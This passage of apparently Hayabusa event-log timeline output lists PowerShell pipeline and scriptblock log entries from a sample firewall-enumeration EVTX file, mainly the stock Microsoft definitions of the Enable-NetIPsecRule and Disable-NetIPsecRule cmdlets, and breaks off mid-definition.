ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Sync-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Update-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] 
${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] 
${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_va",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lues = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) 
$__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and 
(@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and 
(@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { 
@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Disable-NetIPsecRule { 
[CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 